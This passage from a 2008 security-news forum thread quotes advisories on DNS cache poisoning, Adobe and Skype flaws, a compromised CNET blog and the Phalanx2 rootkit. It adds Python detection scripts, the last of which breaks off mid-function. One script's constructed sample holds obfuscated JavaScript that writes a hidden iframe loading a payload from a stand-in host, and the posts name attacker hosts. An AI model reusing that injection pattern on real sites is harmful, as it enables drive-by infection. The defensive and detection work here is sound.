The SYS component is a -rootkit- that tries to hide all this activity on the infected machine. The backdoor tries to connect to port 80 of a host called nbsstt .3322 .org. Anybody operating this machine would have full access to the infected machine. Well, 3322 .org is one of the well-known Chinese DNS-bouncers that we see a lot in targeted attacks. Does nbsstt mean something? Beats me, but Google will find a user with this nickname posting to several Chinese military-related web forums, such as bbs .cjdby .net. Where does nbsstt .3322 .org point to? IP address 125.116.97.19 is in Zhejiang, China. And it's live right now, answering requests at port 80."

(Screenshots available at the URL above.)

:fear:

AplusWebMaster
2008-06-08, 13:12
FYI...

- http://www.skype.com/security/skype-sb-2008-003.html
Impact: Exploitation of this issue allows an attacker to execute arbitrary code on the targeted victim's machine. An attacker would need to construct a malicious file: URI and send it to the intended victim. Upon clicking the link execution of arbitrary code on the victim's machine will be possible.
Affected software: ...The following Skype clients are vulnerable to this attack:
Skype for Windows: All releases prior to and including 3.8.*.115
Solution: Skype has fixed the vulnerability in version 3.8.0.139
Download:
x86 platform, Microsoft Windows 2000 or Microsoft Windows XP: http://www.skype.com/download/skype/windows/
x86 platform, Linux: http://www.skype.com/download/skype/linux/
PPC and x86 platforms, Mac OS X v10.3.9 or later: http://www.skype.com/download/skype/macosx/
Pocket PC platform, Microsoft Windows Mobile 2003: http://www.skype.com/download/skype/pocketpc/

> http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1805
Original release date: 6/6/2008

:fear:

AplusWebMaster
2008-06-24, 12:29
FYI...

Security Update available for Adobe Reader and Acrobat 8.1.2
- http://www.adobe.com/support/security/bulletins/apsb08-15.html
Release date: June 23, 2008
Vulnerability identifier: APSB08-15
CVE number: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2641
Platform: All platforms
Affected software versions:
* Adobe Reader 8.0 through 8.1.2
* Adobe Reader 7.0.9 and earlier
* Adobe Acrobat Professional, 3D and Standard 8.0 through 8.1.2
* Adobe Acrobat Professional, 3D and Standard 7.0.9 and earlier
NOTE: Adobe Reader 7.1.0 and Acrobat 7.1.0 are not vulnerable to this issue. Adobe Reader 9 and Acrobat 9, expected to be available by July 2008, are also not vulnerable to this issue.

Summary:
A critical vulnerability has been identified in Adobe Reader and Acrobat 8.1.2. This vulnerability would cause the application to crash and could potentially allow an attacker to take control of the affected system.
Adobe recommends users of Acrobat 8 and Adobe Reader install the 8.1.2 Security Update 1 patch.

Solution:
Acrobat 8 and Adobe Reader: Adobe recommends Adobe Reader 8 users update to Adobe Reader 8.1.2 Security Update 1, available at the links below:
For Windows: http://www.adobe.com/support/downloads/detail.jsp?ftpID=3967
For Macintosh: http://www.adobe.com/support/downloads/detail.jsp?ftpID=3966
Adobe recommends Acrobat 8 users on Windows update to Acrobat 8.1.2 Security Update 1, available here: http://www.adobe.com/support/downloads/detail.jsp?ftpID=3976
Adobe recommends Acrobat 8 users on Macintosh update to Acrobat 8.1.2 Security Update 1, available here: http://www.adobe.com/support/downloads/detail.jsp?ftpID=3977
Adobe recommends Acrobat 3D Version 8 users on Windows update to Acrobat 3D Version 8.1.2 Security Update 1, available here: http://www.adobe.com/support/downloads/detail.jsp?ftpID=3975
Users with Adobe Reader 7.0 through 7.0.9 should upgrade to Adobe Reader 7.1.0: http://www.adobe.com/go/getreader.
Acrobat 7
Adobe recommends Acrobat 7 users on Windows update to Acrobat 7.1.0, available here: http://www.adobe.com/support/downloads/product.jsp?product=1&platform=Windows
Adobe recommends Acrobat 7 users on Macintosh update to Acrobat 7.1.0, available here: http://www.adobe.com/support/downloads/product.jsp?product=1&platform=Macintosh

Severity rating:
Adobe categorizes this as a critical issue and recommends affected users update their installations...
NOTE: there are reports that this issue is being exploited in the wild..."

- http://blog.trendmicro.com/pdf-exploit-causes-bsod/
June 25, 2008 - "...According to the Adobe Security Bulletin on this issue*, the vulnerability exists in Adobe Reader 7.0.9 and earlier versions, 8.0 to 8.1.2, and in Adobe Acrobat 7.0.9 and earlier versions, 8.0 to 8.1.2... As of the most recent testing, TROJ_PIDIEF.AC is observed to download an info-stealer (mostly monitoring and gathering information about running processes, installed programs and system information) and a spammer which connects the compromised PC to a botnet. The common danger faced by users who encounter downloaders: you never really know what you’re going to get. Since malware writers have continuous access to the URL, they can update the downloaded file with different or more damaging payloads..."
* http://www.adobe.com/support/security/bulletins/apsb08-15.html
---

Adobe Reader patch, now you see it, now you don't
- http://news.cnet.com/8301-13554_3-9979638-33.html
June 27, 2008

:fear:

AplusWebMaster
2008-06-27, 12:55
FYI...

- http://blogs.zdnet.com/security/?p=1356
June 26, 2008 - "What happens when the official domain names of the organizations that issue the domain names in general, and provide all the practical guidance on how (to) prevent DNS hijacking, end up having their own domain names hijacked? A wake up call for the Internet community. The official domains of ICANN, the Internet Corporation for Assigned Names and Numbers, and IANA, the Internet Assigned Numbers Authority were hijacked earlier today... NetDevilz left the following message on all of the domains:
“You think that you control the domains but you don’t! Everybody knows wrong. We control the domains including ICANN! Don’t you believe us? haha ... (Lovable Turkish hackers group)”..."
- http://www.zone-h.org/content/view/14973/30/
27 June 2008 - "...Hijacked domains include "icann.com", "icann.net", "iana.com" and "iana-servers.com". We reached the defacers by email but they refused to tell us how they changed the DNS records, however a cross-site scripting or cross-site request forgery vulnerability might have been exploited..."

(Screenshots available at the ZDnet URL above.)

:fear::spider::fear:

AplusWebMaster
2008-07-09, 14:38
FYI...

- http://www.securityfocus.com/news/11526
2008-07-08 - "...The CERT vulnerability note* describing the issue lists more than 90 software developers and network equipment vendors that may be affected by the issue...Internet service providers and companies each received the fix on Tuesday... The goal: To have every major service provider and company apply their software patches in 30 days..."

* U.S.CERT: http://www.kb.cert.org/vuls/id/800113

- http://isc.sans.org/diary.html?storyid=4687
Last Updated: 2008-07-08 23:09:39 UTC ...(Version: 4)

Microsoft MS08-037: http://www.microsoft.com/technet/security/Bulletin/MS08-037.mspx
Internet Software Consortium (BIND): http://www.isc.org/sw/bind/bind-security.php ...

DNSSEC Overview: http://www.dnssec.org
DNSSEC Deployment Initiative: http://www.dnssec-deployment.org
DNSSEC HowTo: http://www.nlnetlabs.nl/dnssec_howto

- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1447
7/8/2008
- http://www.us-cert.gov/cas/techalerts/TA08-190B.html
7/8/2008

DNS Checker:
- http://www.doxpara.com/?p=1162
Dan Kaminsky - July 9, 2008

:fear:

AplusWebMaster
2008-07-10, 16:57
FYI...

* http://download.zonealarm.com/bin/free/pressReleases/2008/LossOfInternetAccessIssue.html
Last Revised: 9 July 2008
"Overview: Microsoft Update KB951748 [MS08-037] is known to cause loss of internet access for ZoneAlarm users on Windows XP/2000. Windows Vista users are not affected.
Impact: Sudden loss of internet access
Platforms Affected: ZoneAlarm Free, ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Anti-Spyware, and ZoneAlarm Security Suite ...
Recommended Actions:
Download and install the latest versions which solve the loss of internet access problem here*..."

//

AplusWebMaster
2008-07-16, 15:40
FYI...

Oracle Critical Patch Update Advisory - July 2008
- http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html
2008-JUL-15 - Initial release
"...Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply fixes as soon as possible..."

- http://isc.sans.org/diary.html?storyid=4732
Last Updated: 2008-07-15 20:45:56 UTC ...(Version: 2) - "...first time patches for BEA, Hyperion and TimesTen technology are included in the release. If you are running software from these recently-acquired vendors, please be aware..."

- http://www.us-cert.gov/current/#oracle_releases_critical_patch_update3
July 15, 2008 - "Oracle has released their Critical Patch Update for July 2008 to address 45 vulnerabilities across several products. This update contains the following security fixes:
* 11 updates for Oracle Database
* 3 updates for Times Ten In-Memory Database
* 9 updates for Oracle Application Server
* 6 updates for Oracle E-Business Suite and Applications
* 2 updates for Oracle Enterprise Manager
* 7 updates for Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne
* 7 updates for BEA Product Suite ..."

:fear::spider:

AplusWebMaster
2008-07-22, 16:38
RE: http://forums.spybot.info/showpost.php?p=210672&postcount=77

FYI... http://isc.sans.org/diary.html?storyid=4765
Last Updated: 2008-07-22 11:01:30 UTC - "It seems the cat might be out of the bag regarding Dan Kaminsky's upcoming presentation at Blackhat. Since this now means the bad guys have access to it at will - I found the speculations using Google, I'm sure they have done so already, the urgency of patching your recursive DNS servers just increased significantly..."

- http://preview.tinyurl.com/64wtnc
July 21, 2008 (Computerworld)

- http://www.us-cert.gov/current/#dns_implementations_vulnerable_to_cache
updated July 22, 2008 - "...UPDATE: Technical details regarding this vulnerability have been posted to public websites. Attackers could use these details to construct exploit code. Users are encouraged to patch vulnerable systems immediately..."

- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1447
CVSS v2 Base score: 7.5 (High)

:fear:

AplusWebMaster
2008-07-24, 14:10
FYI...

- http://securitylabs.websense.com/content/Alerts/3139.aspx
07.23.2008 - "...At time of this alert, an exploit targeting this flaw has been added to Metasploit, an open source penetration testing tool that is free and publicly available. The US-CERT advisory also makes the several important “DNS best practices” recommendations. Please reference the advisory for complete details. http://www.kb.cert.org/vuls/id/800113 "

- http://www.microsoft.com/technet/security/Bulletin/MS08-037.mspx
Revisions
• V2.1 (July 23, 2008): Affected Software table revised to add MS06-064, MS07-062, and MS08-001 as bulletins replaced by this update.

//

AplusWebMaster
2008-07-24, 17:42
FYI...

DNS Exploit in the Wild...
- http://isc.sans.org/diary.html?storyid=4765
Last Updated: 2008-07-24 13:15:25 UTC ...(Version: 6) - "... A second module has been released for domains, which replaces the nameservers of the target domain. Unlike the first module which will not replace a cached entry, this exploit will do cache overwrites.
See http://blog.wired.com/27bstroke6/2008/07/dns-exploit-in.html
...Emerging Threats is offering a freely available snort signature* for DNS servers. As always, test before using in critical production environments."

* http://www.emergingthreats.net/content/view/87/1/
24 July 2008

:fear:

AplusWebMaster
2008-07-25, 15:23
FYI...

- http://www.theregister.co.uk/2008/07/25/isps_slow_to_patch/
25 July 2008 - "More than two weeks after security researchers warned of a critical defect in the net's address lookup system, some of the world's biggest internet service providers - including AT&T, BT, Time Warner and Bell Canada - have yet to install a patch inoculating their subscribers against attacks. According to an informal survey of Register readers, 15 ISPs failed the "Check my DNS" test*... Now that attack code exploiting the vulnerability has been leaked into the wild, millions of subscribers are at risk of being silently redirected to impostor sites that try to install malware or steal sensitive information. Comcast and Plusnet were the only two ISPs we found that weren't vulnerable... Subscribers of ISPs that are still vulnerable ought to hardwire an alternate DNS server into their operating system. We're partial to OpenDNS**. They've been vulnerability free... Other ISPs that were reported vulnerable include: Skybroadband, Carphone Warehouse Broadband, Opal Telecom, T-Mobile, Videotron Telecom, Roadrunner, Orange, Enventis Telecom, Earthlink, Griffin Internet and Jazztel. Demon Internet was reported as potentially being vulnerable..."

* http://www.doxpara.com/

** http://opendns.org/

:fear:

AplusWebMaster
2008-07-26, 12:59
FYI...

- http://db.tidbits.com/article/9706
24 Jul 2008 - "...Apple has yet to patch this vulnerability, which affects both Mac OS X and Mac OS X Server. While individual computers that look up DNS are vulnerable, servers are far more at risk due to the nature and scope of the attack. Apple uses the popular Internet Systems Consortium BIND DNS server which was one of the first tools patched, but Apple has yet to include the fixed version in Mac OS X Server, despite being notified of vulnerability details early in the process and being informed of the coordinated patch release date. All users of Mac OS X Server who use it for recursive DNS must immediately switch to an alternative* or risk being compromised and traffic being redirected..."

Apple server alternative:
* https://www.opendns.com/start?device=apple-osx-server

Apple client alternatives:
* OS X Leopard: https://www.opendns.com/start?device=apple-osx-leopard
* OS X Tiger: https://www.opendns.com/start?device=apple-osx-tiger
* OS 9: https://www.opendns.com/start?device=apple-os9

:fear:

AplusWebMaster
2008-07-30, 00:13
FYI...

- http://www.securityfocus.com/brief/783
2008-07-28 - "A group of security researchers demonstrated on Monday one way to use the recent domain-name service (DNS) security issue to compromise computers by redirecting insecure update services to fake servers that install malicious code instead. The attack tool - dubbed Evilgrade by its creators at non-profit Infobyte Security Research - will enable penetration testers to exploit computers using the automated update feature of Sun Microsystems' Java, Winzip, Winamp, Mac OS X, OpenOffice, iTunes, Linkedin Toolbar, DAP, Notepad++, and Speedbit, according to the group*..."
* http://blog.metasploit.com/2008/07/evilgrade-will-destroy-us-all.html

:fear:

AplusWebMaster
2008-07-30, 13:30
FYI...

DNS patches cause problems...
The patches have caused slowdowns in servers running BIND and have crippled some machines running Windows Server
- http://preview.tinyurl.com/65ujxu
July 29, 2008 (Infoworld) - "Patches released earlier this month to quash a critical bug in the DNS (Domain Name System) have slowed servers running BIND (Berkeley Internet Name Domain), the Internet's most popular DNS software, and crippled some systems running versions of Windows Server. Paul Vixie, who heads the Internet Systems Consortium (ISC), the group responsible for the BIND software, acknowledged issues with the July 8 fix that was rolled out... Vixie wasn't specific about the extent of the performance problems facing high-volume DNS servers, but said that a second round of patches, due later this week, will remedy port allocation issues and "allow TCP queries and zone transfers while issuing as many outstanding UDP queries as possible." Versions of the second update, which will be designated P2 when they're unveiled, are currently available in beta form for BIND 9.4.3* and BIND 9.5.1**...
ISC wasn't the only vendor involved in first-round DNS patching that has issued a mea culpa. Two weeks ago, Microsoft confirmed that the July 8 DNS update, tagged as MS08-037, was crippling machines running Windows Small Business Server, a suite based on, among other programs, Windows Server 2003... Last Friday, the company unveiled a pair of support documents that spelled out the patch's unintended side effects, but also added Exchange Server 2003 and Internet Security and Acceleration (ISA) Server to the affected list***. A second issue involves every supported version of Windows, ranging from Windows 2000, XP and Vista to Server 2003 and Server 2008.****..."

* http://www.isc.org/sw/bind/view?release=9.4.3b2

** http://www.isc.org/sw/bind/view?release=9.5.1b1

*** http://support.microsoft.com//kb/956189
Last Review: July 25, 2008 - Revision: 1.0

**** http://support.microsoft.com/kb/956188
Last Review: July 25, 2008 - Revision: 1.1

:fear:

AplusWebMaster
2008-08-01, 12:51
FYI...

Apple Security Update 2008-005...
- http://isc.sans.org/diary.html?storyid=4810
Last Updated: 2008-08-01 08:27:35 UTC - "Apple released their patch overnight... Most importantly it contains the workaround for the DNS bug CVE-2008-1447. Also included is an upgrade to PHP 5.2.6 (which was released in source code at http://www.php.net/ on May 1st). Seems we all need to urge Jobs' gang to release patches significantly faster: it's the price to pay to base parts of your system on open source code. Apple Mac OS X users get it through Software Update. As always it's one big patch, given that little choice, you'll want to PATCH NOW."

- http://support.apple.com/kb/HT2647
August 01, 2008

- http://www.apple.com/support/downloads/
07/31/2008

- http://secunia.com/advisories/31326/
Release Date: 2008-08-01
Critical: Highly critical
Impact: Security Bypass, Spoofing, Privilege escalation, DoS, System access
Where: From remote
Solution Status: Vendor Patch
OS: Apple Macintosh OS X ...
Solution: Apply Security Update 2008-005...

---

- http://isc.sans.org/diary.html?storyid=4810
Last Updated: 2008-08-01 20:06:50 UTC ...(Version: 3) "...UPDATE ...Apple might have fixed some of the more important parts for servers, but is far from done yet as all the clients linked against a DNS client library still need to get the workaround for the protocol weakness..."

---

Web-based DNS Randomness Test
- https://www.dns-oarc.net/oarc/services/dnsentropy

:fear:

AplusWebMaster
2008-08-02, 16:01
FYI...

BIND: -P2 patches are released
- http://isc.sans.org/diary.html?storyid=4816
Last Updated: 2008-08-02 11:12:39 UTC - "As expected, the Internet Systems Consortium released patches today addressing stability and performance issues that some of those with significant load on their systems were struggling with.
* BIND 9.5.0-P2: http://www.isc.org/sw/bind/view/?release=9.5.0-P2
* BIND 9.4.2-P2: http://www.isc.org/sw/bind/view/?release=9.4.2-P2
* BIND 9.3.5-P2: http://www.isc.org/sw/bind/view/?release=9.3.5-P2 ..."

:fear:

AplusWebMaster
2008-08-03, 14:01
For the end-user, to recap all this, IMHO, the bottom line is here:

Web-based DNS Randomness Test
- https://www.dns-oarc.net/oarc/services/dnsentropy
Test My DNS

...and if you still have problems, go here and DO IT:
- http://www.opendns.com/


.
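
The following is an added worked example, not part of the post above and not code from DNS-OARC, doxpara or SANS ISC. It shows what the randomness checkers linked in this thread measure: whether the source port and the transaction ID of a resolver's outgoing queries are unpredictable, and why a fixed or sequential port leaves only the 16-bit TXID between a blind spoofer and a poisoned cache. The query samples are constructed with a seeded RNG rather than captured from a live resolver, and the thresholds and verdict strings are this example's own, not the public checkers'.

```python
"""Score a recursive resolver's source-port and transaction-ID randomness from
queries it sent to an authoritative server, in the spirit of the DNS-OARC
"Web-based DNS Randomness Test" and the doxpara "Check my DNS" test.
Added example for this thread, not DNS-OARC, doxpara or SANS code; the two
query samples are constructed with a seeded RNG, not captured traffic."""
import math
import random
from collections import Counter


def entropy_bits(values):
    """Shannon entropy (bits) of the observed values. A sample of N queries can
    show at most log2(N) bits, so a 64-query sample tops out at 6 bits."""
    n = len(values)
    return -sum((c / n) * math.log2(c / n) for c in Counter(values).values())


def looks_sequential(values):
    """True when 80% or more of consecutive deltas are small positive steps:
    a counter, not a random number generator."""
    deltas = [b - a for a, b in zip(values, values[1:])]
    if not deltas:
        return False
    return sum(1 for d in deltas if 0 < d <= 4) / len(deltas) >= 0.8


def is_predictable(values):
    """Fixed (one value reused for most queries) or sequential."""
    return len(set(values)) <= max(1, len(values) // 8) or looks_sequential(values)


def score_resolver(samples):
    """samples: list of (source_port, txid) pairs, one per outgoing query.

    A blind spoofer racing the real authority must match both fields. With a
    fixed or sequential port only the 16-bit TXID stands in the way (about 65k
    guesses, which is what made the attack practical); random ports add
    roughly another 16 bits."""
    if len(samples) < 2:
        raise ValueError("need at least two queries to say anything")
    ports = [p for p, _ in samples]
    txids = [t for _, t in samples]
    port_bits = 0 if is_predictable(ports) else 16
    txid_bits = 0 if is_predictable(txids) else 16
    cap = math.log2(len(samples))
    if port_bits == 0:
        verdict = "POOR: source port is fixed or sequential; only the TXID protects you"
    elif txid_bits == 0:
        verdict = "POOR: transaction IDs are predictable"
    elif entropy_bits(ports) >= cap - 0.5 and entropy_bits(txids) >= cap - 0.5:
        verdict = "GOOD: ports and TXIDs look random"
    else:
        verdict = "FAIR: some randomness, but values repeat more than expected"
    return {
        "queries": len(samples),
        "distinct_ports": len(set(ports)),
        "port_entropy_bits": round(entropy_bits(ports), 2),
        "txid_entropy_bits": round(entropy_bits(txids), 2),
        "min_spoof_bits": port_bits + txid_bits,
        "verdict": verdict,
    }


def _constructed_sample(random_ports, seed=1, n=64):
    """Constructed query sample: random TXIDs, and either random ephemeral
    ports (patched resolver) or one fixed port (pre-patch behaviour)."""
    rng = random.Random(seed)
    return [((rng.randint(1024, 65535) if random_ports else 32768), rng.randint(0, 65535))
            for _ in range(n)]


PATCHED = _constructed_sample(random_ports=True)
UNPATCHED = _constructed_sample(random_ports=False)

if __name__ == "__main__":
    for label, sample in (("patched", PATCHED), ("unpatched", UNPATCHED)):
        print(label, score_resolver(sample))
```

To use it against a real resolver, point the resolver at a zone you control, log the (source port, TXID) pairs that reach your authoritative server, and feed them to score_resolver(); a handful of dozen queries is enough to tell a fixed port from a randomised one. Note that a NAT device in front of the resolver can undo the port randomisation the patch added, which is why the public checkers test from the client's side of the network.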

AplusWebMaster
2008-08-07, 02:57
FYI...

- http://securitylabs.websense.com/content/Alerts/3151.aspx
08.06.2008 - "Websense... has discovered that a CNET Networks <http://www.cnet.com/about/?tag=ft> site has been compromised. The main page of the CNET Clientside Developer Blog contains malicious JavaScript code that de-obfuscates into an iframe that loads its primary malicious payload from a different host.

The malicious code is observed to exploit a known integer overflow vulnerability in Adobe Flash ( http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-0071 ). At the time of this alert, the site is still hosting the malicious code. Visitors who are not patched against this vulnerability will be infected without any user interaction.
Software vulnerable to this attack includes:
- Adobe, Flash Player, 9.0.115.0*, and previous
- Adobe, Flex, 3.0
- Adobe, AIR, 1.0 ..."

(Screenshot available at the Websense URL above.)

* http://www.adobe.com/go/getflashplayer
Current Adobe Flash Player version 9.0.124.0

:fear::spider:
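
Added example, not Websense's code and not part of the post above: a static first-pass decoder for the pattern the alert describes, JavaScript that only turns into an iframe after unescape(), String.fromCharCode() and "a"+"b" string joins have been applied, with the frame then loading from a host other than the page's own. Nothing is executed, so packers that need a real JavaScript engine (eval chains, custom decoders) are out of scope and must go to a sandbox. The sample page and its example.com / example.net hosts are constructed.

```python
"""Static first-pass decoder for obfuscated web-malware JavaScript of the kind
in the Websense alert above: text that becomes an <iframe> only after
unescape(), String.fromCharCode() and "a"+"b" joins have been applied, with the
frame then loading from a host other than the page's own. Added example written
for this thread, not Websense's code; nothing here executes JavaScript, and the
sample page with its example.com / example.net hosts is constructed."""
import html
import re
from urllib.parse import urlparse

_CONCAT = re.compile(r"(['\"])\s*\+\s*\1")                     # "ab" + "cd" -> "abcd"
_UNESCAPE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.I | re.S)
_FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([0-9,\s]*?)\s*\)", re.I)
_IFRAME_SRC = re.compile(r"<iframe\b[^>]*?\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)


def js_unescape(s):
    """JavaScript unescape(): %uXXXX and %XX sequences back to characters."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"%([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)


def deobfuscate(script, max_rounds=5):
    """Fold the three common layering tricks until the text stops changing.
    Pure text rewriting: eval() chains and custom decoders are not handled."""
    for _ in range(max_rounds):
        before = script
        script = _CONCAT.sub("", script)
        script = _UNESCAPE.sub(lambda m: m.group(1) + js_unescape(m.group(2)) + m.group(1), script)
        script = _FROMCHARCODE.sub(
            lambda m: '"' + "".join(chr(int(x)) for x in m.group(1).split(",") if x.strip()) + '"',
            script)
        if script == before:
            break
    return script


def external_iframes(page_html, page_url):
    """List iframes whose host differs from the page's own, marking those that
    only appear after deobfuscation (a plain read of the page shows none)."""
    own = (urlparse(page_url).hostname or "").lower()

    def off_host(text):
        text = html.unescape(text).replace('\\"', '"').replace("\\'", "'")
        found = {}
        for m in _IFRAME_SRC.finditer(text):
            host = (urlparse(m.group(1)).hostname or "").lower()
            if host and host != own:
                found.setdefault(m.group(1), host)
        return found

    plain, decoded = off_host(page_html), off_host(deobfuscate(page_html))
    return [{"src": src, "host": host, "hidden_by_obfuscation": src not in plain}
            for src, host in {**plain, **decoded}.items()]


SAMPLE_PAGE_URL = "http://blog.example.com/clientside/"  # constructed
SAMPLE_PAGE = r'''<html><body>
<script type="text/javascript">
var s = unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fpayload.example.net%2Fin.cgi%3F3%22");
s += String.fromCharCode(32,119,105,100,116,104,61,48,32,104,101,105,103,104,116,61,48,62);
document.write(s + "</" + "iframe>");
</script>
<iframe src="http://blog.example.com/widgets/comments"></iframe>
</body></html>'''

if __name__ == "__main__":
    for finding in external_iframes(SAMPLE_PAGE, SAMPLE_PAGE_URL):
        print(finding)
```

Run it over a saved copy of a suspect page; an off-host iframe that is only visible after decoding is the signature worth escalating, while the page's own legitimate frames (comments widgets, ad slots on the same host) fall out as noise.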

AplusWebMaster
2008-08-20, 00:34
FYI...

- http://securitylabs.websense.com/content/Alerts/3163.aspx
08.19.2008 - "Websense... has detected that the DNS cache on the default DNS server used by the customers of China Netcom (CNC) has been poisoned. When China Netcom customers mistype and enter an invalid domain name, the poisoned DNS server directs the visitor's browser to a page that contains malicious code. China Netcom is among the top ISPs in that country.
When users mistype a domain name, they are sometimes directed by their ISPs to a placeholder Web site with generic advertisements. This is typically an additional revenue source for the ISP. In the case of CNC, customers of this prominent ISP are directed to a Web site under the control of an attacker. These malicious sites contain an iframe with malicious code that attempts to exploit, among other applications and plug-ins, the Microsoft Snapshot Viewer vulnerability... The malicious iframe points to a server in China hosting exploits for RealPlayer, MS06-014, MS Snapshot Viewer and Adobe Flash player..."

(Screenshots available at the URL above.)

:fear::fear:

AplusWebMaster
2008-08-22, 20:04
FYI...

- http://isc.sans.org/diary.html?storyid=4919
Last Updated: 2008-08-22 14:51:00 UTC - "A RedHat list post* acknowledges that last week "some Fedora servers were illegally accessed. The intrusion into the servers was quickly discovered, and the servers were taken offline. Security specialists and administrators have been working since then to analyze the intrusion and the extent of the compromise as well as reinstall Fedora systems".
* https://www.redhat.com/archives/fedora-announce-list/2008-August/msg00012.html

===

- http://isc.sans.org/diary.html?storyid=4921
Last Updated: 2008-08-22 15:45:39 UTC ...(Version: 2) - "...RedHat has released "shell script* which lists the affected packages and can verify that none of them are installed on a system".
* http://www.redhat.com/security/data/openssh-blacklist.html

:fear::fear:

AplusWebMaster
2008-08-27, 03:38
FYI...

- http://isc.sans.org/diary.html?storyid=4937
Last Updated: 2008-08-26 21:52:26 UTC - "...Sources of compromised keys could include the weak key vulnerability in Debian-based systems a few months ago, so if you haven't updated and replaced those keys, you ought to do so now. The biggest defense is to have any keys, especially those used to authenticate to remote machines and certainly internet facing ones, require a passphrase to use. Check your logs, especially if you use SSH key-based auth, to identify accesses from remote machines that have no business accessing you. If you have IPs, that would be good. To detect if you have Phalanx2, look for /etc/khubd.p2/ (access by cd, not ls) or any directory that is called "khubd.p2". /dev/shm/ may contain files from the attack as well. Tripwire, AIDE and friends should also be able to detect filesystem changes."

- http://www.us-cert.gov/current/#ssh_key_based_attacks
August 26, 2008 - "US-CERT is aware of active attacks against linux-based computing infrastructures using compromised SSH keys. The attack appears to initially use stolen SSH keys to gain access to a system, and then uses local kernel exploits to gain root access. Once root access has been obtained, a rootkit known as "phalanx2" is installed.
Phalanx2 appears to be a derivative of an older rootkit named "phalanx". Phalanx2 and the support scripts within the rootkit, are configured to systematically steal SSH keys from the compromised system. These SSH keys are sent to the attackers, who then use them to try to compromise other sites and other systems of interest at the attacked site. Detection of phalanx2 as used in this attack may be performed as follows:
* "ls" does not show a directory "/etc/khubd.p2/", but it can be entered with "cd /etc/khubd.p2".
* "/dev/shm/" may contain files from the attack.
* Any directory named "khubd.p2" is hidden from "ls", but may be entered by using "cd".
* Changes in the configuration of the rootkit might change the attack indicators listed above. Other detection methods may include searching for hidden processes and checking the reference count in "/etc" against the number of directories shown by "ls".

US-CERT encourages administrators to perform the following actions to help mitigate the risks:
* Proactively identify and examine systems where SSH keys are used as part of automated processes. These keys will typically not have passphrases or passwords.
* Encourage users to use the keys with passphrase or passwords to reduce the risk if a key is compromised.
* Review access paths to internet facing systems and ensure that systems are fully patched.

If a compromise is confirmed, US-CERT recommends the following actions:
* Disable key-based SSH authentication on the affected systems, where possible.
* Perform an audit of all SSH keys on the affected systems.
* Notify all key owners of the potential compromise of their keys.
US-CERT will provide additional information as it becomes available."

:fear::mad::fear:
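
Added example, not code from US-CERT or SANS ISC and not part of the post above: a script that applies the two Phalanx2 indicators US-CERT lists (a directory that "cd" can enter but "ls" does not show, and an /etc link count that does not match the subdirectories listed) and then checks which SSH private keys lack a passphrase, the defence the ISC diary calls the biggest. The /etc/khubd.p2 path is the one named in the post; the sample key blobs are constructed and not usable as keys. The link-count check only means something on filesystems that keep the classic "2 + subdirectories" convention (ext4, xfs, tmpfs); btrfs and overlayfs report 1 for every directory, which the code reports as "no information" rather than as a hidden directory.

```python
"""Host checks for the two Phalanx2 indicators in the US-CERT note above (a
directory that "cd" can enter but "ls" does not show, and an /etc link count
that does not match the subdirectories listed) plus the defensive point from
the same post: SSH private keys that have no passphrase. Added example written
for this thread, not code from US-CERT or SANS ISC. The path below is the one
the post names; the sample key blobs are constructed and unusable as keys."""
import base64
import os
import struct

PHALANX2_DIRS = ["/etc/khubd.p2"]  # indicator named in the US-CERT note


def hidden_but_enterable(path):
    """True when stat() sees a directory that its parent's listing omits:
    the "cd works, ls does not show it" indicator."""
    if not os.path.isdir(path):
        return False
    parent, name = os.path.split(path.rstrip("/"))
    try:
        return name not in os.listdir(parent or "/")
    except OSError:
        return False


def nlink_discrepancy(nlink, visible_subdirs):
    """On classic Unix filesystems a directory's link count is 2 + number of
    subdirectories, so a positive remainder is a subdirectory that exists but
    was not listed. Returns None when the filesystem does not keep that
    invariant (btrfs and overlayfs report 1) or the numbers are inconsistent."""
    if nlink < 2:
        return None
    hidden = nlink - 2 - visible_subdirs
    return hidden if hidden >= 0 else None


def count_hidden_subdirs(path):
    """Apply nlink_discrepancy() to a real directory, e.g. "/etc"."""
    with os.scandir(path) as it:
        visible = sum(1 for e in it if e.is_dir(follow_symlinks=False))
    return nlink_discrepancy(os.lstat(path).st_nlink, visible)


def private_key_is_encrypted(data):
    """True if an SSH private key needs a passphrase. Understands the
    openssh-key-v1 container (cipher name other than "none") and legacy PEM
    keys (Proc-Type: 4,ENCRYPTED). Raises ValueError for anything else."""
    text = data.decode("ascii", "replace")
    if "BEGIN OPENSSH PRIVATE KEY" in text:
        body = "".join(l for l in text.splitlines() if not l.startswith("-----"))
        raw = base64.b64decode(body)
        magic = b"openssh-key-v1\x00"
        if len(raw) < len(magic) + 4 or not raw.startswith(magic):
            raise ValueError("bad openssh-key-v1 container")
        (n,) = struct.unpack(">I", raw[len(magic):len(magic) + 4])
        cipher = raw[len(magic) + 4:len(magic) + 4 + n]
        return cipher != b"none"
    if "PRIVATE KEY-----" in text:
        return "Proc-Type: 4,ENCRYPTED" in text
    raise ValueError("not an SSH private key")


def unprotected_keys(ssh_dir=None):
    """Private keys under ssh_dir that anyone who copies them can use at once."""
    ssh_dir = ssh_dir or os.path.expanduser("~/.ssh")
    found = []
    if not os.path.isdir(ssh_dir):
        return found
    for name in sorted(os.listdir(ssh_dir)):
        path = os.path.join(ssh_dir, name)
        if name.endswith(".pub") or not os.path.isfile(path):
            continue
        try:
            with open(path, "rb") as f:
                if not private_key_is_encrypted(f.read()):
                    found.append(path)
        except (ValueError, OSError):
            continue
    return found


def _constructed_openssh_key(cipher):
    """Just enough of an openssh-key-v1 container to exercise the parser."""
    payload = b"openssh-key-v1\x00" + struct.pack(">I", len(cipher)) + cipher
    b64 = base64.b64encode(payload).decode()
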